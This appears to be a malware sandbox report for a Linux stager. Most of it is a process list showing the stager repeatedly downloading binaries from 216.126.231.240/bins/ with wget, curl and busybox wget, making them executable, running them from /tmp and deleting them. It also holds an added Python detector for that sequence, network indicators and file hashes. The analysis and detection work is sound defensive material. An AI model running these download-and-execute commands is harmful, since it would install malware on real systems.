[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]
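The process lists of behavioral1 and behavioral2 record the same loop for every name under /bins/: try wget, curl -O and busybox wget in turn, chmod 777 the result, run it from /tmp, then rm it. The detector below turns that sequence into a rule over exec events. It is an added example, not code from the sandbox report or from the sample; the (exe_path, argv) events are a constructed stand-in shaped like the report's process list, and the two benign look-alikes at the end (a chmod of a hypothetical /tmp/notes.txt and a fetch from the hypothetical host example.invalid) exist only to show what must not fire.

```python
"""Detect the fetch -> chmod 777 -> execute-from-/tmp -> rm stager loop.

Added example, not part of the sandbox report.  Feed it (exe_path, argv)
exec events in execution order, e.g. from auditd EXECVE records, an eBPF
exec trace or the sandbox's own process export."""
import re
from collections import OrderedDict
from dataclasses import dataclass, field

URL_RE = re.compile(r"https?://[^\s\]]+")
FETCH_TOOLS = ("wget", "curl", "busybox")   # the three downloaders the loop tries in turn


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


@dataclass
class Chain:
    url: str = ""                                  # first URL the name was fetched from
    fetch_tools: set = field(default_factory=set)  # which downloaders were tried
    chmod_mode: str = ""                           # mode applied after the fetch
    executed_from: str = ""                        # path it was run from
    deleted: bool = False                          # unlinked after execution

    def complete(self) -> bool:
        return bool(self.url and self.chmod_mode == "777"
                    and self.executed_from and self.deleted)


def detect_stager_chains(events, stage_dir="/tmp"):
    """Return an OrderedDict payload_name -> Chain for every fully completed chain.

    A stage is only credited once the previous stage was seen for the same
    payload name, so an unrelated chmod or rm can never complete a chain."""
    chains = OrderedDict()
    for exe, argv in events:
        tool = basename(exe)
        m = URL_RE.search(" ".join(argv))
        if tool in FETCH_TOOLS and m:
            url = m.group(0)
            c = chains.setdefault(basename(url), Chain())
            c.url = c.url or url
            # busybox applets are named by argv[1] (e.g. "busybox wget")
            c.fetch_tools.add("busybox " + argv[1] if tool == "busybox" and len(argv) > 1 else tool)
        elif tool == "chmod" and len(argv) >= 3:
            for target in argv[2:]:
                c = chains.get(basename(target))
                if c and c.url:
                    c.chmod_mode = argv[1]
        elif exe.startswith(stage_dir + "/"):
            c = chains.get(basename(exe))
            if c and c.chmod_mode:
                c.executed_from = exe
        elif tool == "rm":
            for target in argv[1:]:
                c = chains.get(basename(target))
                if c and c.executed_from and not target.startswith("-"):
                    c.deleted = True
    return OrderedDict((n, c) for n, c in chains.items() if c.complete())


def payload_urls(hits) -> list:
    """Network IOCs implied by the completed chains (sorted, de-duplicated)."""
    return sorted({c.url for c in hits.values()})


C2 = "http://216.126.231.240/bins/"   # hosting path recorded in the report
A = "rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu"
B = "qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr"

# Constructed events mirroring the report's process list, plus two benign
# look-alikes (hypothetical paths) that must not produce a hit.
SAMPLE_EVENTS = [
    ("/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN",
     ["/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN"]),
    ("/bin/rm", ["/bin/rm", "bins.sh"]),
    ("/usr/bin/wget", ["wget", C2 + A]),
    ("/usr/bin/curl", ["curl", "-O", C2 + A]),
    ("/bin/busybox", ["/bin/busybox", "wget", C2 + A]),
    ("/bin/chmod", ["chmod", "777", A]),
    ("/tmp/" + A, ["./" + A]),
    ("/bin/rm", ["rm", A]),
    ("/usr/bin/wget", ["wget", C2 + B]),
    ("/bin/chmod", ["chmod", "777", B]),
    ("/tmp/" + B, ["./" + B]),
    ("/bin/rm", ["rm", B]),
    ("/bin/chmod", ["chmod", "777", "/tmp/notes.txt"]),                  # benign: never fetched
    ("/usr/bin/curl", ["curl", "-O", "http://example.invalid/README"]),  # benign: never chmod'ed or run
]

if __name__ == "__main__":
    found = detect_stager_chains(SAMPLE_EVENTS)
    for name, c in found.items():
        print(f"{name}: fetched via {sorted(c.fetch_tools)} from {c.url}, "
              f"chmod {c.chmod_mode}, ran as {c.executed_from}, deleted={c.deleted}")
    print("payload URLs:", payload_urls(found))
```

Ordering is the point of the rule: a lone chmod 777 in /tmp or an rm of something that was never run is common on a build box, while fetch, mode change, execution and deletion of the same name in that order is the stager's signature regardless of which of the three downloaders succeeded. The URL list it returns is what feeds the network correlation, and it stays correct when the loop runs twice over the same names, as behavioral2 shows.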

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/864-1-0xb66e8000-0xb66f9044-memory.dmp

memory/864-2-0xb66ca000-0xb66db044-memory.dmp

memory/882-3-0xb6701000-0xb6712044-memory.dmp

memory/882-4-0xb66cb000-0xb66dc044-memory.dmp

memory/902-5-0xb673d000-0xb674e044-memory.dmp

memory/908-6-0xb676f000-0xb6780044-memory.dmp